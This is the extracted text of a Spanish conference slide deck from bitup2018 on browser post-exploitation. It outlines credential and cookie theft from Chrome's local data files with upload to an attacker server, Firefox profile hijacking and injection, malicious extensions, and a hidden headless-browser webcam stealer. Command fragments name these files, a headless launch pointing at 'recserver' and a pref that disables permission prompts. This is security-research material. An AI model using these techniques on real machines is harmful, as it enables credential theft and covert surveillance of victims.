SlideShare una empresa de Scribd logo
1 de 51
Descargar para leer sin conexión
Seguridad
en
Navegadores Web
#bitup2018
@j0moz4
Seguridad en navegadores web #bitup2018
QUÉ ES ESTO...
Seguridad en navegadores web (chrome & firefox)
Algunas técnicas ofensivas (PoCs) “Post-Explotación”
Sencillos scripts en python y javascript
Puntos de partida para desarrollar Hi!Bro
ZeuS Web Browser Trojan
- Se detectó por primera vez en el año 2007 en EE. UU.
- Afectó a los navegadores IE y Firefox (Windows)
- 3.6 millones de ordenadores infectados (2009)
- Puerta de entrada a otros troyanos.
ZeuS Web Browser Trojan
Principales características de ZeuS
Keystroke logging
- Consiste en almacenar
un registro con las
pulsaciones físicas de un
teclado.
Form grabbing
- Es un tipo de malware, que
trabaja recuperando las
credenciales de
autorización y registros de
un formulario web.
MALICIOUS EXTENSIONS
MALICIOUS EXTENSIONS
MALICIOUS EXTENSIONS
MALICIOUS EXTENSIONS
Browser as a target
Browser
Stealer
- Cookies
- Password
- Postdata
- Credit Cards
- Session tokens
BROWSER STEALER
BROWSER STEALER
BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE)
● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data"
VICTIM
Run payload.exe...
BROWSER STEALER
BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE)
● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data"
● %APPDATA%LocalGoogleChromeUser DataDefaultCookies"
● %APPDATA%LocalGoogleChromeUser DataDefaultWeb Data"
○ Autocomplete, bank cards, browser searches
● %APPDATA%LocalGoogleChromeUser DataDefaultHistory"
○ browsing and downloads history
VICTIM
Run payload.exe...
BROWSER STEALER
VICTI
Run payload.exe...
SERVER logins, history, cookies, cc’s...
(base64Encoded)
VICTIM
BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE)
● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data"
● %APPDATA%LocalGoogleChromeUser DataDefaultCookies"
● %APPDATA%LocalGoogleChromeUser DataDefaultWeb Data"
○ Autocomplete, bank cards, browser searches
● %APPDATA%LocalGoogleChromeUser DataDefaultHistory"
○ browsing and downloads history
Profile
Hijacking
&
Injection
Profile Hijacking
Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles
● firefox.exe -createProfile “<profName profPath>”
● firefox.exe -P
VICTIM
Run payload.exe...
Profile Hijacking
VICTI
Run payload.exe...
SERVER GZIP Profiles Folders
VICTIM
Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles
● firefox.exe -createProfile “<profName profPath>”
● firefox.exe -P
Profile Hijacking
VICTI
Run payload.exe...
SERVER GZIP Profiles Folders
VICTIM
Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles
● firefox.exe -createProfile “<profName profPath>”
● firefox.exe -P
Unzip and create the new profile
SERVER
Profile Injection
%AppData%RoamingMozillaFirefoxprofiles.ini
VICTIM
Run payload.exe...
Profile Injection
%AppData%RoamingMozillaFirefoxprofiles.ini
VICTIM
Run payload.exe...
Profile Injection
%AppData%RoamingMozillaFirefoxprofiles.ini
VICTIM
Run payload.exe...
Profile Injection
%AppData%RoamingMozillaFirefoxprofiles.ini
VICTI
Run payload.exe...
VICTI
Run payload.exe...
SERVER Inject fake profiles.ini
(no need permissions)
VICTIM
Profile Injection
%AppData%RoamingMozillaFirefoxprofiles.ini
prefs.js ( about:config )
VICTI
Run payload.exe...Run payload.exe...
SERVER Inject fake profiles.ini
(no need permissions)
VICTIM
Profile Injection
%AppData%RoamingMozillaFirefoxprofiles.ini
prefs.js ( about:config )
VICTIM
Run payload.exe...
VICTIM
Run payload.exe...
SERVER Inject fake profiles.ini
(no need permissions)
VICTIM
Profile Injection
%AppData%RoamingMozillaFirefoxprofiles.ini
prefs.js ( about:config )
VICTIM
Run payload.exe...
VICTIM
Run payload.exe...
SERVER Inject fake profiles.ini
(no need permissions)
VICTIM
Headless Browser
HEADLESS BROWSER
● Navegador web sin una interfaz gráfica
● Se pueden tomar screenshots.
● “No aparece en el administrador de tareas”
HEADLESS BROWSER
● Navegador web sin una interfaz gráfica
● Se pueden tomar screenshots.
● “No aparece en el administrador de tareas”
DEMO
ABOUT EXTENSIONS...
ABOUT EXTENSIONS...
Malicious extensions
Extensions can:
● Inject JAVASCRIPT in browsing
● Modify DOM
● Execute JS in background
ABOUT EXTENSIONS...
extension.crx (zip)
ABOUT EXTENSIONS...
extension.crx (zip)
ABOUT EXTENSIONS...
extension.crx (zip)
ABOUT EXTENSIONS...
extension.crx (zip)
ABOUT EXTENSIONS...
extension.crx (zip)
chrome.exe --load-extension=”Extension Path”
chrome.exe --load-extension=”Extension Path”
“http://<webpage>/”
The wonderful world of client side hacking
The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
MEDIA.NAVIGATOR.PERMISSION.DISABLED
The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
Run payload.exe...
VICTIM
profile injection;
firefox.exe -headless “http://recserver/”
CHROME GPO’s
C:WindowsPolicyDefinitions
C:WindowsPolicyDefinitionses-ES
CHROME GPO’s
CHROME GPO’s
CHROME GPO’s
CHROME GPO’s
CHROME GPO’s
CONCLUSIONES
- Hacking browser (Profile Hijacking)
- Client-Side Hacking (MITB)
Muchas más cosas:
- Master chrome file
- Selenium
- Headless remote debug port
- Mucho javascript por aprender...
GRACIAS :-)

Más contenido relacionado

Similar a Seguridad en navegadores web #bitup2018

Negligencia vs desconocimiento_cp
Negligencia vs desconocimiento_cpNegligencia vs desconocimiento_cp
Negligencia vs desconocimiento_cpcampus party
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosastico2llorente
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosastico2llorente
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
seguridad informatica
seguridad informaticaseguridad informatica
seguridad informaticaAdriana Gil
 
Peligros Internet Menores
Peligros Internet MenoresPeligros Internet Menores
Peligros Internet MenoresMaite Pelacho
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesNextel S.A.
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesPablo Garaizar
 
Seguridad informática y de ti
Seguridad informática y de tiSeguridad informática y de ti
Seguridad informática y de tiMario Nizama
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Seguridad informática. 15 12 (2)
Seguridad informática. 15 12 (2)Seguridad informática. 15 12 (2)
Seguridad informática. 15 12 (2)Jorge Millan
 

Similar a Seguridad en navegadores web #bitup2018 (20)

Troyanos
TroyanosTroyanos
Troyanos
 
Negligencia vs desconocimiento_cp
Negligencia vs desconocimiento_cpNegligencia vs desconocimiento_cp
Negligencia vs desconocimiento_cp
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosas
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosas
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
 
Troyanos
TroyanosTroyanos
Troyanos
 
Pdf2
Pdf2Pdf2
Pdf2
 
Malware
MalwareMalware
Malware
 
seguridad informatica
seguridad informaticaseguridad informatica
seguridad informatica
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
 
ANTIVIRUS
ANTIVIRUSANTIVIRUS
ANTIVIRUS
 
Peligros Internet Menores
Peligros Internet MenoresPeligros Internet Menores
Peligros Internet Menores
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
F:\Spyware
F:\SpywareF:\Spyware
F:\Spyware
 
Virus informatico
Virus informaticoVirus informatico
Virus informatico
 
Seguridad informática y de ti
Seguridad informática y de tiSeguridad informática y de ti
Seguridad informática y de ti
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Seguridad informática. 15 12 (2)
Seguridad informática. 15 12 (2)Seguridad informática. 15 12 (2)
Seguridad informática. 15 12 (2)
 
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
 

Último

VIDEOS DE APOYO.docx E
VIDEOS DE APOYO.docx                                  EVIDEOS DE APOYO.docx                                  E
VIDEOS DE APOYO.docx Emialexsolar
 
Inmersión global en ciberseguridad e IA en la conferencia RSA.pdf
Inmersión global en ciberseguridad e IA en la conferencia RSA.pdfInmersión global en ciberseguridad e IA en la conferencia RSA.pdf
Inmersión global en ciberseguridad e IA en la conferencia RSA.pdfOBr.global
 
Inteligencia artificial dentro de la contabilidad
Inteligencia artificial dentro de la contabilidadInteligencia artificial dentro de la contabilidad
Inteligencia artificial dentro de la contabilidaddanik1023m
 
Matriz de integración de tecnologías- Paola Carvajal.docx
Matriz de integración de tecnologías- Paola Carvajal.docxMatriz de integración de tecnologías- Paola Carvajal.docx
Matriz de integración de tecnologías- Paola Carvajal.docxPaolaCarolinaCarvaja
 
Actividad 14_ Diseño de Algoritmos Paralelos.pdf
Actividad 14_ Diseño de Algoritmos Paralelos.pdfActividad 14_ Diseño de Algoritmos Paralelos.pdf
Actividad 14_ Diseño de Algoritmos Paralelos.pdfalejandrogomezescoto
 
Los mejores simuladores de circuitos electrónicos.pdf
Los mejores simuladores de circuitos electrónicos.pdfLos mejores simuladores de circuitos electrónicos.pdf
Los mejores simuladores de circuitos electrónicos.pdfodalistar77
 
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...RaymondCode
 
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdfPresentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdfymiranda2
 
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdfTENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdfJoseAlejandroPerezBa
 
Hazte partner: Club Festibity 2024 - 2025
Hazte partner: Club Festibity 2024 - 2025Hazte partner: Club Festibity 2024 - 2025
Hazte partner: Club Festibity 2024 - 2025Festibity
 
De Código a Ejecución: El Papel Fundamental del MSIL en .NET
De Código a Ejecución: El Papel Fundamental del MSIL en .NETDe Código a Ejecución: El Papel Fundamental del MSIL en .NET
De Código a Ejecución: El Papel Fundamental del MSIL en .NETGermán Küber
 
El diseño de Algoritmos Paralelos.pdf - analisis de algortimos
El diseño de Algoritmos Paralelos.pdf - analisis de algortimosEl diseño de Algoritmos Paralelos.pdf - analisis de algortimos
El diseño de Algoritmos Paralelos.pdf - analisis de algortimosLCristinaForchue
 

Último (14)

VIDEOS DE APOYO.docx E
VIDEOS DE APOYO.docx                                  EVIDEOS DE APOYO.docx                                  E
VIDEOS DE APOYO.docx E
 
Inmersión global en ciberseguridad e IA en la conferencia RSA.pdf
Inmersión global en ciberseguridad e IA en la conferencia RSA.pdfInmersión global en ciberseguridad e IA en la conferencia RSA.pdf
Inmersión global en ciberseguridad e IA en la conferencia RSA.pdf
 
Inteligencia artificial dentro de la contabilidad
Inteligencia artificial dentro de la contabilidadInteligencia artificial dentro de la contabilidad
Inteligencia artificial dentro de la contabilidad
 
BEDEC Proyecto y obra , novedades 2024 - Xavier Folch
BEDEC Proyecto y obra , novedades 2024 - Xavier FolchBEDEC Proyecto y obra , novedades 2024 - Xavier Folch
BEDEC Proyecto y obra , novedades 2024 - Xavier Folch
 
Matriz de integración de tecnologías- Paola Carvajal.docx
Matriz de integración de tecnologías- Paola Carvajal.docxMatriz de integración de tecnologías- Paola Carvajal.docx
Matriz de integración de tecnologías- Paola Carvajal.docx
 
Actividad 14_ Diseño de Algoritmos Paralelos.pdf
Actividad 14_ Diseño de Algoritmos Paralelos.pdfActividad 14_ Diseño de Algoritmos Paralelos.pdf
Actividad 14_ Diseño de Algoritmos Paralelos.pdf
 
Los mejores simuladores de circuitos electrónicos.pdf
Los mejores simuladores de circuitos electrónicos.pdfLos mejores simuladores de circuitos electrónicos.pdf
Los mejores simuladores de circuitos electrónicos.pdf
 
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
 
BEDEC Sostenibilidad, novedades 2024 - Laura Silva
BEDEC Sostenibilidad, novedades 2024 - Laura SilvaBEDEC Sostenibilidad, novedades 2024 - Laura Silva
BEDEC Sostenibilidad, novedades 2024 - Laura Silva
 
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdfPresentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
 
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdfTENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
 
Hazte partner: Club Festibity 2024 - 2025
Hazte partner: Club Festibity 2024 - 2025Hazte partner: Club Festibity 2024 - 2025
Hazte partner: Club Festibity 2024 - 2025
 
De Código a Ejecución: El Papel Fundamental del MSIL en .NET
De Código a Ejecución: El Papel Fundamental del MSIL en .NETDe Código a Ejecución: El Papel Fundamental del MSIL en .NET
De Código a Ejecución: El Papel Fundamental del MSIL en .NET
 
El diseño de Algoritmos Paralelos.pdf - analisis de algortimos
El diseño de Algoritmos Paralelos.pdf - analisis de algortimosEl diseño de Algoritmos Paralelos.pdf - analisis de algortimos
El diseño de Algoritmos Paralelos.pdf - analisis de algortimos
 

Seguridad en navegadores web #bitup2018